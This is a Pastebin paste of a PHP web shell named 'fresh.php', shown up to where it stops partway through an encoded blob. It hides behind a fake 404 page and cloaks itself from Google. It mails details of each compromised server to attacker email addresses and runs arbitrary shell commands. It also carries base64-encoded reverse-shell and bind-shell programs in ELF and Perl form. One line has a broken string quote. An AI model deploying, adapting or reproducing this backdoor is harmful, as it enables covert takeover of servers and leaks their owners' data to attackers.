doctorbug

fresh.php

Feb 12th, 2017
627
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 155.62 KB | None | 0 0
  1. <?php
  2. $password = "4d4098d64e163d2726959455d046fd7c"; // pass default : hacked
  3. $color = "#00ff00";
  4. $sec = 1;
  5. $default_action = 'FilesMan';
  6. @define('SELF_PATH', __FILE__);
  7. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  8.     header('HTTP/1.0 404 Not Found');
  9.     exit;
  10. }
  11. @session_start();
  12. @error_reporting(0);
  13. @ini_set('error_log',NULL);
  14. @ini_set('log_errors',0);
  15. @ini_set('max_execution_time',0);
  16. @set_time_limit(0);
  17. @set_magic_quotes_runtime(0);
  18. @define('VERSION', '2.1');
  19. if( get_magic_quotes_gpc() ) {
  20.     function stripslashes_array($array) {
  21.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  22.     }
  23.     $_POST = stripslashes_array($_POST);
  24. }
  25. function printLogin() {
  26. if(!isset($_SESSION['fuk'])){
  27. $to = "vpindoclub@gmail.com;
  28. $from = "nobody@nobody.com";
  29. $data .= "REPORT SERVER LEAKED<br />";
  30. $data .= "Server Time : ".date("d-m-Y H:i:s")."<br />";
  31. $data .= " Software : ". $_SERVER['SERVER_SOFTWARE']."<br />";
  32. $data .= " Server IP : ".$_SERVER['SERVER_ADDR']."<br />";                             
  33. $data .= " TKP GAN : ".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."<br />";
  34. $data .= " SHIT! , NEW TANGO DOWN !!!";
  35. $headers = "MIME-Version: 1.0\r\n";
  36. $headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
  37. mail($to,"PHP SHELL",$data,$headers);
  38. $_SESSION['fuk'] = "ALX";
  39. }
  40. ?>
  41. <h1>Not Found</h1>
  42. <p>The requested URL was not found on this server.</p>
  43. <hr>
  44. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  45.     <style>
  46.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  47.     </style>
  48.     <center>
  49.     <form method=post>
  50.     <input type=password name=pass>
  51.     </form></center>
  52.     <?php
  53.     exit;
  54. }
  55. if($sec == 1 && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
  56.     if( empty( $password ) ||
  57.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $password ) ) )
  58.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  59.     else
  60.         printLogin();
  61.  
  62. @error_reporting(0);
  63. @set_time_limit(0);
  64.  
  65. function selfURL() { $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : ""; $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s; $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]); return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; } function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); }
  66. $selfurl = base64_encode(selfURL());
  67. $Lversion = php_uname(r);
  68. $OSV = php_uname(s);
  69. if(eregi("Linux",$OSV))
  70. {
  71. $Lversion=substr($Lversion,0,6);
  72. $packet="https://packetstormsecurity.com/search/?q=Exploit+Linux+Kernel+".$Lversion."&s=files";
  73. }else{
  74. $Lversion=substr($Lversion,0,3);
  75. $packet="http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=".$OSV."+".$Lversion;
  76. }
  77.  
  78. if (!function_exists("o2xdaexec"))
  79. {
  80. if(is_callable("popen")){
  81. function o2xdaexec($command) {
  82. if (!($p=popen("($command)2>&1","r"))) {
  83. return 126;
  84. }
  85. while (!feof($p)) {
  86. $line=fgets($p,1000);
  87. $out .= $line;
  88. }
  89. pclose($p);
  90. return $out;
  91. }
  92. }else{
  93. function o2xdaexec($cmd)
  94. {
  95.  global $disablefunc;
  96.  $result = "";
  97.  if (!empty($cmd))
  98.  {
  99.   if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  100.   elseif (($result = `$cmd`) !== FALSE) {}
  101.   elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  102.   elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  103.   elseif (is_resource($fp = popen($cmd,"r")))
  104.   {
  105.    $result = "";
  106.    while(!feof($fp)) {$result .= fread($fp,1024);}
  107.    pclose($fp);
  108.   }
  109.  }
  110.  return $result;
  111. }
  112. }
  113. }
  114. $back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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EgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
  115.  
  116. $back_connect_pl="JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07DQogaWYoICR2aXNpdGNvdW50ID09ICIiKQ0KIHskdmlzaXRjb3VudCA9IDA7IA0KICR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07IA0KICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogJGxvZ19lbWFpbCA9ICJjNGsxbEBob3RtYWlsLmNvbSI7DQogJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KICR0YXJnZXQgPSByYXd1cmxkZWNvZGUoJHdlYi4kaW5qKTsNCiAkYm9keSA9ICJIYWxsbyBiYW5nLCBhZGEgeWFuZyBhYmlzIG5hbmFtIGJhY2tkb29yIGRpIDogICR0YXJnZXQgfCBwYXNzd29yZCA9ICRwYXNzd29yZCBJUCA9ICR2aXNpdG9yIjsgQG1haWwoIiRsb2dfZW1haWwiLCIiLCAiJGJvZHkiKTsNCiB9IGVsc2UgeyANCiAkdmlzaXRjb3VudDsgDQogfSBzZXRjb29raWUoInZpc2l0cyIsJHZpc2l0Y291bnQpOw==";
  117.  
  118. $back_connect="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7CiRjbWQ9ICJseW54IjsKJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7CiRzeXN0ZW0xPSAnZWNobyAiYGlkYCI7JzsKJHN5c3RlbTI9ICdlY2hvICJgcHdkYCI7JzsKJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsKJHN5c3RlbTQ9ICcvYmluL3NoJzsKJDA9JGNtZDsKJHRhcmdldD0kQVJHVlswXTsKJHBvcnQ9JEFSR1ZbMV07CiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG89Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKb3BlbihTVERJTiwgIj4mU09DS0VUIik7Cm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOwpwcmludCAiXG5cbjo6IEluZG9uZXNpYW4gQ29kZXIgU3lzdGVtIDo6XG5cbiI7CnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyAKc3lzdGVtKCRzeXN0ZW0pOwpwcmludCAiXG5Zb3VyIElEOiAiOyAKc3lzdGVtKCRzeXN0ZW0xKTsKcHJpbnQgIlxuQ3VycmVudCBEaXJlY3Rvcnk6ICI7IApzeXN0ZW0oJHN5c3RlbTIpOwpwcmludCAiXG4iOwpzeXN0ZW0oJHN5c3RlbTMpOyBzeXN0ZW0oJHN5c3RlbTQpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7";
  119.  
  120. $backdoor="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAAAIlEJASLRfCJBCToKP7//4XAeRjHBCSTiQQI6Kj9///HBCQBAAAA6Bz+///HRCQECAAAAItF8IkEJOi5/f//hcB5GMcEJJiJBAjoef3//8cEJAEAAADo7f3//8dF6BAAAACNReiNVcSJRCQIiVQkBItF8IkEJOht/f//iUX0g330AHkMxwQkjIkECOg4/f//6EP9//+FwA+EpwAAAItF+Ln/////iUW4uAAAAAD8i3248q6JyPfQg+gBx0QkDAAAAACJRCQIi0X4iUQkBItF9IkEJOiQ/f//x0QkBAAAAACLRfSJBCToPf3//8dEJAQBAAAAi0X0iQQk6Cr9///HRCQEAgAAAItF9IkEJOgX/f//x0QkCAAAAADHRCQEn4kECMcEJJ+JBAjoe/z//4tF8IkEJOiA/P//xwQkAAAAAOgE/f//i0X0iQQk6Gn8///pDv///1WJ5VdWMfZT6H/9//+BwyMSAACD7AzoEfz//42DIP///42TIP///4lF8CnQwfgCOcZzFonX/xSyi0Xwg8YBKfiJ+sH4AjnGcuyDxAxbXl9dw1WJ5YPsGIld9Ogt/f//gcPREQAAiXX4iX38jbMg////jbsg////Kf7B/gLrA/8Ut4PuAYP+/3X16DoAAACLXfSLdfiLffyJ7F3DkFWJ5VOD7AShrJkECIP4/3QSu6